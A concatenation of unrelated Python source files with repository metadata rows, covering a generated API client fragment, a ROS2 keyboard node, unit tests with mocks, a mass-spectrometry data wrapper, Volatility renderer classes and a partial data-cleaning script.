local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/applications/{applicationId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_applications(self, **kwargs): # noqa: E501
"""Get all applications # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_applications(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get applications. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: ApplicationList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_applications_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_applications_with_http_info(**kwargs) # noqa: E501
return data
def get_all_applications_with_http_info(self, **kwargs): # noqa: E501
"""Get all applications # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_applications_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get applications. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: ApplicationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_applications" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('page_number', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/applications', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_application_by_id(self, application_id, **kwargs): # noqa: E501
"""Get application by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_application_by_id(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int application_id: The ID of the application to get (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_application_by_id_with_http_info(application_id, **kwargs) # noqa: E501
else:
(data) = self.get_application_by_id_with_http_info(application_id, **kwargs) # noqa: E501
return data
def get_application_by_id_with_http_info(self, application_id, **kwargs): # noqa: E501
"""Get application by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_application_by_id_with_http_info(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int application_id: The ID of the application to get (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_application_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application_id' is set
if self.api_client.client_side_validation and ('application_id' not in params or
params['application_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `application_id` when calling `get_application_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application_id' in params:
path_params['applicationId'] = params['application_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/applications/{applicationId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Application', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.751843 | 142 | 0.614063 |
ff8fc6aabd9e97f8734da3a7af645921ec9e3f9e | 1,110 | py | Python | oreilly_ws/src/teleopbot/teleopbot/keyboard_driver.py | brand25/ros2_tuto | 9fc1dd4f130baa5ad6376227ea6869549b09e66c | [
"Apache-2.0"
] | 1 | 2022-02-02T07:50:55.000Z | 2022-02-02T07:50:55.000Z | oreilly_ws/src/teleopbot/teleopbot/keyboard_driver.py | brand25/ros2_tuto | 9fc1dd4f130baa5ad6376227ea6869549b09e66c | [
"Apache-2.0"
] | null | null | null | oreilly_ws/src/teleopbot/teleopbot/keyboard_driver.py | brand25/ros2_tuto | 9fc1dd4f130baa5ad6376227ea6869549b09e66c | [
"Apache-2.0"
] | null | null | null | import sys, select, tty, termios
import rclpy
from rclpy.node import Node
from rclpy.qos import QoSProfile
from std_msgs.msg import String
class KeyboardDriver(Node):
def __init__(self):
super().__init__('keyboard_driver')
self._key_pub = self.create_publisher(String, 'keys', QoSProfile(depth=10))
self._timer = self.create_timer(0.01, self.timer_callback)
print("Publishing keystrokes. Press Ctrl-C to exit...")
def timer_callback(self):
if select.select([sys.stdin], [], [], 0)[0] == [sys.stdin]:
msg = String()
msg.data = sys.stdin.read(1)
self._key_pub.publish(msg)
def main(args=None):
old_attr = termios.tcgetattr(sys.stdin)
tty.setcbreak(sys.stdin.fileno())
try:
rclpy.init(args=args)
keyboard_driver = KeyboardDriver()
rclpy.spin(keyboard_driver)
keyboard_driver.destroy_node()
rclpy.shutdown()
except Exception as e:
print(e)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_attr)
if __name__ == '__main__':
main()
| 27.073171 | 83 | 0.646847 |
447b2bfb7e1975e6b7c2bc8ec423dc8ffac76fbe | 2,836 | py | Python | tests/test_stups/test_piu.py | mschwitalla/senza | 301a43fde41db194cbb80c68271692d1fe2212db | [
"Apache-2.0"
] | 106 | 2015-03-30T14:15:15.000Z | 2021-07-26T07:30:11.000Z | tests/test_stups/test_piu.py | mschwitalla/senza | 301a43fde41db194cbb80c68271692d1fe2212db | [
"Apache-2.0"
] | 547 | 2015-04-13T09:58:50.000Z | 2021-01-26T11:20:35.000Z | tests/test_stups/test_piu.py | mschwitalla/senza | 301a43fde41db194cbb80c68271692d1fe2212db | [
"Apache-2.0"
] | 102 | 2015-04-01T08:09:53.000Z | 2020-11-05T09:05:28.000Z | from unittest.mock import MagicMock
import pytest
from senza.exceptions import PiuNotFound
from senza.stups.piu import Piu
def test_request_access(monkeypatch):
m_call = MagicMock()
monkeypatch.setattr('senza.stups.piu.call', m_call)
Piu.request_access('127.0.0.1', 'no reason', None, True)
m_call.assert_called_once_with(['piu', 'request-access',
'127.0.0.1', 'no reason via senza',
'--connect'])
m_call.reset_mock()
Piu.request_access('127.0.0.1', 'no reason', None, False)
m_call.assert_called_once_with(['piu', 'request-access',
'127.0.0.1', 'no reason via senza'])
m_call.reset_mock()
Piu.request_access('127.0.0.1', 'no reason', 'example.com', True)
m_call.assert_called_once_with(['piu', 'request-access',
'127.0.0.1', 'no reason via senza',
'--connect',
'-O', 'example.com'])
def test_find_odd_host(monkeypatch):
m_client = MagicMock()
m_client.return_value = m_client
hosted_zone1 = {'Config': {'PrivateZone': False},
'CallerReference': '0000',
'ResourceRecordSetCount': 42,
'Id': '/hostedzone/random1',
'Name': 'example.com.'}
mock_records = [{'Name': 'odd-eu-west-1.example.com.',
'ResourceRecords': [{'Value': '127.0.0.1'}],
'TTL': 600,
'Type': 'A'}
]
m_client.list_hosted_zones.return_value = {'MaxItems': '100',
'ResponseMetadata': {
'HTTPStatusCode': 200,
'RequestId': 'FakeId'},
'HostedZones': [hosted_zone1],
'IsTcallcated': False}
m_client.list_resource_record_sets.return_value = {
"ResourceRecordSets": mock_records}
monkeypatch.setattr('boto3.client', m_client)
odd_host = Piu.find_odd_host('eu-west-1')
assert odd_host == 'odd-eu-west-1.example.com'
no_odd_host = Piu.find_odd_host('moon-crater-1')
assert no_odd_host is None
def test_request_access_not_installed(monkeypatch):
m_call = MagicMock()
m_call.side_effect = FileNotFoundError
monkeypatch.setattr('senza.stups.piu.call', m_call)
with pytest.raises(PiuNotFound):
Piu.request_access('127.0.0.1', 'no reason', None, True)
m_call.assert_called_once_with(['piu', 'request-access',
'127.0.0.1', 'no reason via senza',
'--connect'])
| 40.514286 | 77 | 0.52433 |
c918ef008f35488d5f6b858412d5f292e543dd33 | 2,976 | py | Python | astrosource/test/mocks.py | zemogle/autovar | d495a336c0559097f566c2ce3f6136645f29ed62 | [
"MIT"
] | 1 | 2019-01-28T13:35:39.000Z | 2019-01-28T13:35:39.000Z | astrosource/test/mocks.py | zemogle/astrosource | d495a336c0559097f566c2ce3f6136645f29ed62 | [
"MIT"
] | 14 | 2019-10-28T13:09:32.000Z | 2022-02-10T22:43:03.000Z | astrosource/test/mocks.py | zemogle/autovar | d495a336c0559097f566c2ce3f6136645f29ed62 | [
"MIT"
] | 3 | 2019-09-27T11:16:14.000Z | 2021-02-07T23:10:19.000Z | from unittest.mock import MagicMock
from astropy.table import Table, Column
import numpy as np
def create_table_cols():
mag = Column(np.array([12.33699989,12.03499985,11.31900024,12.20699978,11.48400021,11.88599968,12.09300041], dtype=np.float32))
emag = Column(np.array([0.025,0.021,0.025,0.035,0.022,0.027,0.015], dtype=np.float32))
return mag, emag
def create_coords():
ra = np.array([163.096971,163.1466597,163.159242,163.197136,163.4236044,163.3569756,163.3740879])
dec = np.array([-49.8792031,-49.8609692,-50.0239071,-49.8522255,-49.8430644,-49.9384119,-50.0038352])
return ra, dec
def mock_vizier_query_region(*args, **kwargs):
ra, dec = create_coords()
return Table([ra, dec], names=('RAJ2000', 'DEJ2000'), dtype=('float64', 'float64'))
def mock_vizier_query_region_sdss(*args, **kwargs):
ra, dec = create_coords()
return Table([ra, dec], names=('RA_ICRS', 'DE_ICRS'), dtype=('float64', 'float64'))
def mock_vizier_query_region_vsx(*args, **kwargs):
t = mock_vizier_query_region()
q = {'B/vsx/vsx' : t }
return q
def mock_vizier_query_region_apass_b(*args, **kwargs):
t = mock_vizier_query_region()
m,e = create_table_cols()
t.add_column(m, name='Bmag')
t.add_column(e, name='e_Bmag')
t.add_column(m, name='Vmag')
t.add_column(e, name='e_Vmag')
q = {'II/336/apass9' : t }
return q
def mock_vizier_query_region_apass_v(*args, **kwargs):
t = mock_vizier_query_region()
m,e = create_table_cols()
t.add_column(m, name='Vmag')
t.add_column(e, name='e_Vmag')
t.add_column(m, name='Bmag')
t.add_column(e, name='e_Bmag')
q = {'II/336/apass9' : t }
return q
def mock_vizier_query_region_ps_r(*args, **kwargs):
t = mock_vizier_query_region()
m,e = create_table_cols()
qual = Column(np.array([52,52,52,3,52,3,52],dtype='uint8'))
t.add_column(m, name='rmag')
t.add_column(e, name='e_rmag')
t.add_column(m, name='imag')
t.add_column(e, name='e_imag')
t.add_column(qual, name='Qual')
q = {'II/349/ps1' : t }
return q
def mock_vizier_query_region_sdss_r(*args, **kwargs):
t = mock_vizier_query_region_sdss()
m,e = create_table_cols()
qual = Column(np.array([52,3,3,3,52,3,52],dtype='uint8'))
t.add_column(m, name='rmag')
t.add_column(e, name='e_rmag')
t.add_column(m, name='imag')
t.add_column(e, name='e_imag')
t.add_column(qual, name='Q')
q = {'V/147/sdss12' : t }
return q
def mock_vizier_apass_b(*args, **kwargs):
mock = MagicMock(query_region=mock_vizier_query_region_apass_b)
return mock
def mock_vizier_apass_v(*args, **kwargs):
mock = MagicMock(query_region=mock_vizier_query_region_apass_v)
return mock
def mock_vizier_ps_r(*args, **kwargs):
mock = MagicMock(query_region=mock_vizier_query_region_ps_r)
return mock
def mock_vizier_sdss_r(*args, **kwargs):
mock = MagicMock(query_region=mock_vizier_query_region_sdss_r)
return mock
| 33.438202 | 131 | 0.681452 |
76010a7006fa4f6c0a3e0ebc2e86288fb686be92 | 3,158 | py | Python | fisher_py/data/business/reaction.py | abdelq/fisher_py | befb98732ba7c4e57858d158c68cda09ed829d66 | [
"MIT"
] | 3 | 2021-11-03T20:55:45.000Z | 2022-02-01T10:11:47.000Z | fisher_py/data/business/reaction.py | abdelq/fisher_py | befb98732ba7c4e57858d158c68cda09ed829d66 | [
"MIT"
] | 2 | 2022-01-28T02:04:21.000Z | 2022-01-29T01:29:14.000Z | fisher_py/data/business/reaction.py | abdelq/fisher_py | befb98732ba7c4e57858d158c68cda09ed829d66 | [
"MIT"
] | 1 | 2022-01-26T23:30:37.000Z | 2022-01-26T23:30:37.000Z | from fisher_py.net_wrapping import NetWrapperBase
from fisher_py.data.filter_enums import ActivationType
class Reaction(NetWrapperBase):
"""
The Reaction interface. Defines a reaction for fragmenting an ion (an MS/MS stage).
"""
def __init__(self, reaction_net):
super().__init__()
self._wrapped_object = reaction_net
@property
def precursor_mass(self) -> float:
"""
Gets the precursor mass (mass acted on)
"""
return self._get_wrapped_object_().PrecursorMass
@property
def collision_energy(self) -> float:
"""
Gets the collision energy of this reaction
"""
return self._get_wrapped_object_().CollisionEnergy
@property
def isolation_width(self) -> float:
"""
Gets the isolation width of the precursor mass
"""
return self._get_wrapped_object_().IsolationWidth
@property
def precursor_range_is_valid(self) -> bool:
"""
Gets a value indicating whether precursor range is valid. If this is true, then
ThermoFisher.CommonCore.Data.Business.IReaction.PrecursorMass is still the center
of the range, but the values ThermoFisher.CommonCore.Data.Business.IReaction.FirstPrecursorMass
and ThermoFisher.CommonCore.Data.Business.IReaction.LastPrecursorMass define
the limits of the precursor mass range
"""
return self._get_wrapped_object_().PrecursorRangeIsValid
@property
def first_precursor_mass(self) -> float:
"""
Gets the start of the precursor mass range (only if ThermoFisher.CommonCore.Data.Business.IReaction.PrecursorRangeIsValid)
"""
return self._get_wrapped_object_().FirstPrecursorMass
@property
def last_precursor_mass(self) -> float:
"""
Gets the end of the precursor mass range (only if ThermoFisher.CommonCore.Data.Business.IReaction.PrecursorRangeIsValid)
"""
return self._get_wrapped_object_().LastPrecursorMass
@property
def collision_energy_valid(self) -> bool:
"""
Gets a value indicating whether collision energy is valid.
"""
return self._get_wrapped_object_().CollisionEnergyValid
@property
def activation_type(self) -> ActivationType:
"""
Gets the activation type.
"""
return ActivationType(self._get_wrapped_object_().ActivationType)
@property
def multiple_activation(self) -> bool:
"""
Gets a value indicating whether this is a multiple activation. In a table of
reactions, a multiple activation is a second, or further, activation (fragmentation
method) applied to the same precursor mass. Precursor mass values should be obtained
from the original activation, and may not be returned by subsequent multiple
activations.
"""
return self._get_wrapped_object_().MultipleActivation
@property
def isolation_width_offset(self) -> float:
"""
Gets the isolation width offset.
"""
return self._get_wrapped_object_().IsolationWidthOffset
| 34.326087 | 130 | 0.677961 |
94afc8ea17ee47132b10cb959a21c07a33b45acc | 16,518 | py | Python | volatility/framework/renderers/__init__.py | dl9rdz/volatility3 | 9d9cdfb7d43b98662089503fdb85f103d551b543 | [
"Linux-OpenIB"
] | null | null | null | volatility/framework/renderers/__init__.py | dl9rdz/volatility3 | 9d9cdfb7d43b98662089503fdb85f103d551b543 | [
"Linux-OpenIB"
] | null | null | null | volatility/framework/renderers/__init__.py | dl9rdz/volatility3 | 9d9cdfb7d43b98662089503fdb85f103d551b543 | [
"Linux-OpenIB"
] | null | null | null | # This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0
# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0
#
"""Renderers.
Renderers display the unified output format in some manner (be it text
or file or graphical output
"""
import collections
import datetime
import logging
from typing import Any, Callable, Iterable, List, Optional, Tuple, TypeVar, Union
from volatility.framework import interfaces
from volatility.framework.interfaces import renderers
vollog = logging.getLogger(__name__)
class UnreadableValue(interfaces.renderers.BaseAbsentValue):
"""Class that represents values which are empty because the data cannot be
read."""
class UnparsableValue(interfaces.renderers.BaseAbsentValue):
"""Class that represents values which are empty because the data cannot be
interpreted correctly."""
class NotApplicableValue(interfaces.renderers.BaseAbsentValue):
"""Class that represents values which are empty because they don't make
sense for this node."""
class NotAvailableValue(interfaces.renderers.BaseAbsentValue):
"""Class that represents values which cannot be provided now (but might in
a future run)
This might occur when information packed with volatility (such as
symbol information) is not available, but a future version or a
different run may later have that information available (ie, it
could be applicable, but we can't get it and it's not because it's
unreadable or unparsable). Unreadable and Unparsable should be used
in preference, and only if neither fits should this be used.
"""
class TreeNode(interfaces.renderers.TreeNode):
"""Class representing a particular node in a tree grid."""
def __init__(self, path: str, treegrid: 'TreeGrid', parent: Optional['TreeNode'],
values: List[interfaces.renderers.BaseTypes]) -> None:
if not isinstance(treegrid, TreeGrid):
raise TypeError("Treegrid must be an instance of TreeGrid")
self._treegrid = treegrid
self._parent = parent
self._path = path
self._validate_values(values)
self._values = treegrid.RowStructure(*values) # type: ignore
def __repr__(self) -> str:
return "<TreeNode [{}] - {}>".format(self.path, self._values)
def __getitem__(self, item: Union[int, slice]) -> Any:
return self._treegrid.children(self).__getitem__(item)
def __len__(self) -> int:
return len(self._treegrid.children(self))
def _validate_values(self, values: List[interfaces.renderers.BaseTypes]) -> None:
"""A function for raising exceptions if a given set of values is
invalid according to the column properties."""
if not (isinstance(values, collections.Sequence) and len(values) == len(self._treegrid.columns)):
raise TypeError(
"Values must be a list of objects made up of simple types and number the same as the columns")
for index in range(len(self._treegrid.columns)):
column = self._treegrid.columns[index]
val = values[index]
if not isinstance(val, (column.type, interfaces.renderers.BaseAbsentValue)):
raise TypeError(
"Values item with index {} is the wrong type for column {} (got {} but expected {})".format(
index, column.name, type(val), column.type))
# TODO: Consider how to deal with timezone naive/aware datetimes (and alert plugin uses to be precise)
# if isinstance(val, datetime.datetime):
# tznaive = val.tzinfo is None or val.tzinfo.utcoffset(val) is None
@property
def values(self) -> Iterable[interfaces.renderers.BaseTypes]:
"""Returns the list of values from the particular node, based on column
index."""
return self._values
@property
def path(self) -> str:
"""Returns a path identifying string.
This should be seen as opaque by external classes, Parsing of
path locations based on this string are not guaranteed to remain
stable.
"""
return self._path
@property
def parent(self) -> Optional['TreeNode']:
"""Returns the parent node of this node or None."""
return self._parent
@property
def path_depth(self) -> int:
"""Return the path depth of the current node."""
return len(self.path.split(TreeGrid.path_sep))
def path_changed(self, path: str, added: bool = False) -> None:
"""Updates the path based on the addition or removal of a node higher
up in the tree.
This should only be called by the containing TreeGrid and
expects to only be called for affected nodes.
"""
components = self._path.split(TreeGrid.path_sep)
changed = path.split(TreeGrid.path_sep)
changed_index = len(changed) - 1
if int(components[changed_index]) >= int(changed[-1]):
components[changed_index] = str(int(components[changed_index]) + (1 if added else -1))
self._path = TreeGrid.path_sep.join(components)
class TreeGrid(interfaces.renderers.TreeGrid):
"""Class providing the interface for a TreeGrid (which contains TreeNodes)
The structure of a TreeGrid is designed to maintain the structure of the tree in a single object.
For this reason each TreeNode does not hold its children, they are managed by the top level object.
This leaves the Nodes as simple data carries and prevents them being used to manipulate the tree as a whole.
This is a data structure, and is not expected to be modified much once created.
Carrying the children under the parent makes recursion easier, but then every node is its own little tree
and must have all the supporting tree functions. It also allows for a node to be present in several different trees,
and to create cycles.
"""
path_sep = "|"
def __init__(self, columns: List[Tuple[str, interfaces.renderers.BaseTypes]],
generator: Optional[Iterable[Tuple[int, Tuple]]]) -> None:
"""Constructs a TreeGrid object using a specific set of columns.
The TreeGrid itself is a root element, that can have children but no values.
The TreeGrid does *not* contain any information about formatting,
these are up to the renderers and plugins.
Args:
columns: A list of column tuples made up of (name, type).
generator: An iterable containing row for a tree grid, each row contains a indent level followed by the values for each column in order.
"""
self._populated = False
self._row_count = 0
self._children = [] # type: List[TreeNode]
converted_columns = [] # type: List[interfaces.renderers.Column]
if len(columns) < 1:
raise ValueError("Columns must be a list containing at least one column")
for (name, column_type) in columns:
is_simple_type = issubclass(column_type, self.base_types)
if not is_simple_type:
raise TypeError("Column {}'s type is not a simple type: {}".format(name,
column_type.__class__.__name__))
converted_columns.append(interfaces.renderers.Column(name, column_type))
self.RowStructure = collections.namedtuple("RowStructure",
[self.sanitize_name(column.name) for column in converted_columns])
self._columns = converted_columns
if generator is None:
generator = []
generator = iter(generator)
self._generator = generator
@staticmethod
def sanitize_name(text: str) -> str:
output = ""
for letter in text.lower():
if letter != ' ':
output += (letter if letter in 'abcdefghiljklmnopqrstuvwxyz_0123456789' else '_')
return output
def populate(self,
function: interfaces.renderers.VisitorSignature = None,
initial_accumulator: Any = None,
fail_on_errors: bool = True) -> Optional[Exception]:
"""Populates the tree by consuming the TreeGrid's construction
generator Func is called on every node, so can be used to create output
on demand.
This is equivalent to a one-time visit.
Args:
function: The visitor to be called on each row of the treegrid
initial_accumulator: The initial value for an accumulator passed to the visitor to allow it to maintain state
fail_on_errors: A boolean defining whether exceptions should be caught or bubble up
"""
accumulator = initial_accumulator
if function is None:
def function(_x: interfaces.renderers.TreeNode, _y: Any) -> Any:
return None
if not self.populated:
try:
prev_nodes = [] # type: List[TreeNode]
for (level, item) in self._generator:
parent_index = min(len(prev_nodes), level)
parent = prev_nodes[parent_index - 1] if parent_index > 0 else None
treenode = self._append(parent, item)
prev_nodes = prev_nodes[0:parent_index] + [treenode]
if function is not None:
accumulator = function(treenode, accumulator)
self._row_count += 1
except Exception as excp:
if fail_on_errors:
raise
vollog.debug("Exception during population: {}".format(excp))
self._populated = True
return excp
self._populated = True
@property
def populated(self):
"""Indicates that population has completed and the tree may now be
manipulated separately."""
return self._populated
@property
def columns(self) -> List[interfaces.renderers.Column]:
"""Returns the available columns and their ordering and types."""
return self._columns
@property
def row_count(self) -> int:
"""Returns the number of rows populated."""
return self._row_count
def children(self, node) -> List[interfaces.renderers.TreeNode]:
"""Returns the subnodes of a particular node in order."""
return [node for node, _ in self._find_children(node)]
def _find_children(self, node):
"""Returns the children list associated with a particular node.
Returns None if the node does not exist
"""
children = self._children
try:
if node is not None:
for path_component in node.path.split(self.path_sep):
_, children = children[int(path_component)]
except IndexError:
return []
return children
def values(self, node):
"""Returns the values for a particular node.
The values returned are mutable,
"""
if node is None:
raise TypeError("Node must be a valid node within the TreeGrid")
return node.values
def _append(self, parent, values):
"""Adds a new node at the top level if parent is None, or under the
parent node otherwise, after all other children."""
children = self.children(parent)
return self._insert(parent, len(children), values)
def _insert(self, parent, position, values):
"""Inserts an element into the tree at a specific position."""
parent_path = ""
children = self._find_children(parent)
if parent is not None:
parent_path = parent.path + self.path_sep
newpath = parent_path + str(position)
tree_item = TreeNode(newpath, self, parent, values)
for node, _ in children[position:]:
self.visit(node, lambda child, _: child.path_changed(newpath, True), None)
children.insert(position, (tree_item, []))
return tree_item
def is_ancestor(self, node, descendant):
"""Returns true if descendent is a child, grandchild, etc of node."""
return descendant.path.startswith(node.path)
def max_depth(self):
"""Returns the maximum depth of the tree."""
return self.visit(None, lambda n, a: max(a, self.path_depth(n)), 0)
_T = TypeVar("_T")
def visit(self,
node: Optional[interfaces.renderers.TreeNode],
function: Callable[[interfaces.renderers.TreeNode, _T], _T],
initial_accumulator: _T,
sort_key: Optional[interfaces.renderers.ColumnSortKey] = None):
"""Visits all the nodes in a tree, calling function on each one.
function should have the signature function(node, accumulator) and return new_accumulator
If accumulators are not needed, the function must still accept a second parameter.
The order of that the nodes are visited is always depth first, however, the order children are traversed can
be set based on a sort_key function which should accept a node's values and return something that can be
sorted to receive the desired order (similar to the sort/sorted key).
We use the private _find_children function so that we don't have to re-traverse the tree
for every node we descend further down
"""
if not self.populated:
self.populate()
# Find_nodes is path dependent, whereas _visit is not
# So in case the function modifies the node's path, find the nodes first
children = self._find_children(node)
accumulator = initial_accumulator
# We split visit into two, so that we don't have to keep calling find_children to traverse the tree
if node is not None:
accumulator = function(node, initial_accumulator)
if children is not None:
if sort_key is not None:
sort_key_not_none = sort_key # Only necessary because of mypy
children = sorted(children, key = lambda x: sort_key_not_none(x[0].values))
if not sort_key.ascending:
children = reversed(children)
accumulator = self._visit(children, function, accumulator, sort_key)
return accumulator
def _visit(self,
list_of_children: List['TreeNode'],
function: Callable,
accumulator: _T,
sort_key: Optional[interfaces.renderers.ColumnSortKey] = None) -> _T:
"""Visits all the nodes in a tree, calling function on each one."""
if list_of_children is not None:
for n, children in list_of_children:
accumulator = function(n, accumulator)
if sort_key is not None:
sort_key_not_none = sort_key # Only necessary because of mypy
children = sorted(children, key = lambda x: sort_key_not_none(x[0].values))
if not sort_key.ascending:
children = reversed(children)
accumulator = self._visit(children, function, accumulator, sort_key)
return accumulator
class ColumnSortKey(interfaces.renderers.ColumnSortKey):
def __init__(self, treegrid: TreeGrid, column_name: str, ascending: bool = True) -> None:
_index = None
self._type = None
self.ascending = ascending
for i in range(len(treegrid.columns)):
column = treegrid.columns[i]
if column.name.lower() == column_name.lower():
_index = i
self._type = column.type
if _index is None:
raise ValueError("Column not found in TreeGrid columns: {}".format(column_name))
self._index = _index
def __call__(self, values: List[Any]) -> Any:
"""The key function passed as the sort key."""
value = values[self._index]
if isinstance(value, interfaces.renderers.BaseAbsentValue):
if self._type == datetime.datetime:
value = datetime.datetime.min
elif self._type in [int, float]:
value = -1
elif self._type == bool:
value = False
elif self._type in [str, renderers.Disassembly]:
value = "-"
elif self._type == bytes:
value = b""
return value
| 43.468421 | 148 | 0.637547 |
23d07d2cc80472aab4ffd32ec403e237bef306e5 | 434 | py | Python | linear_search.py | svikash/python-basic-program | e0542d98c2985c71cfbaaf3f09ccfdb747a9e2af | [
"MIT"
] | null | null | null | linear_search.py | svikash/python-basic-program | e0542d98c2985c71cfbaaf3f09ccfdb747a9e2af | [
"MIT"
] | null | null | null | linear_search.py | svikash/python-basic-program | e0542d98c2985c71cfbaaf3f09ccfdb747a9e2af | [
"MIT"
] | 1 | 2018-10-01T06:04:27.000Z | 2018-10-01T06:04:27.000Z | n=int(input("enter size of list"))
list=[]
print("enter the elements of list")
for i in range (0,n):
c=int(input(""))
list.append(c)
print("the list is ")
print(list)
flag = 0
search=int(input("enter the number you want to search in list"))
#mid= (l+1)/
for j in range(0,n):
if list[j] == search:
print("found at pos",j+1)
break
else:
print("element not found")
break
| 22.842105 | 65 | 0.569124 |
76f45d488d272a010970d255a5281b72591cc5e2 | 7,045 | py | Python | ml-prediction/ml.py | XiyueWang/arvato_segement_prediction | 84a922b935d039efaf7c7006270eb6066c200f38 | [
"CNRI-Python"
] | null | null | null | ml-prediction/ml.py | XiyueWang/arvato_segement_prediction | 84a922b935d039efaf7c7006270eb6066c200f38 | [
"CNRI-Python"
] | null | null | null | ml-prediction/ml.py | XiyueWang/arvato_segement_prediction | 84a922b935d039efaf7c7006270eb6066c200f38 | [
"CNRI-Python"
] | null | null | null | import numpy as np
import pandas as pd
from sklearn.metrics import roc_auc_score, roc_curve, precision_recall_curve, auc
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import GridSearchCV
from imblearn.under_sampling import TomekLinks
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier
from sklearn.tree import DecisionTreeClassifier
def get_attribute(excel_filepath='DIAS Attributes - Values 2017'):
'''Processes attribute description data
Args:
excel - attribute information
Returns:
dict - dictionary contains attribute names and Values
'''
att_values = pd.read_excel(excel_filepath, header=1)
att_values = att_values.fillna('')
att_values.drop('Unnamed: 0', axis=1, inplace=True)
# find unique values of each attributes
idx = []
for i in range(att_values.shape[0]):
if len(att_values.Attribute[i]) > 0:
idx.append(i)
attr_dict = {}
for i in range(len(idx)-1):
key_name = att_values.Attribute[idx[i]]
attr_dict[key_name] = att_values.Value[idx[i]:idx[i+1]].tolist()
last_key = att_values.Attribute[idx[-1]]
attr_dict[last_key] = att_values.Value[idx[i]:].tolist()
return attr_dict
def check_value(x):
'''check the values for missing value'''
if type(x) == float:
return x
elif x == 'X' or (x == 'XX'):
return np.nan
else:
return float(x)
def clean_data(df, attr_dict):
'''Processes data
- Converts missing values to np.nan using loaded features table
- Drops unwanted columns and rows
- Convert mixed datatype to float
- Perfroms feature enginerring
Args:
df (pd.Dataframe): data to be cleaned
feat_info (to_dict): feature information
Returns:
cleaned_df (pd.Dataframe): cleaned rows
'''
clean_df = df.copy()
cols = clean_df.columns[18:20]
for col in cols:
clean_df[col] = clean_df[col].apply(lambda x: check_value(x))
col_nulls = clean_df.isnull().sum()/clean_df.shape[0]
row_nulls = clean_df.isnull().sum(axis=1)/clean_df.shape[1]
# remove columns with more than 20% nulls in azdias dataframe
cols = col_nulls[col_nulls<=0.22].index.tolist()
clean_df = clean_df.loc[:, cols]
# remove columns with kba
kba_cols = clean_df.columns[clean_df.columns.str.startswith('KBA')]
clean_df.drop(list(kba_cols), axis=1, inplace=True)
# get the dummy for region
dummy = pd.get_dummies(clean_df['OST_WEST_KZ'])
clean_df.drop('OST_WEST_KZ', axis=1, inplace=True)
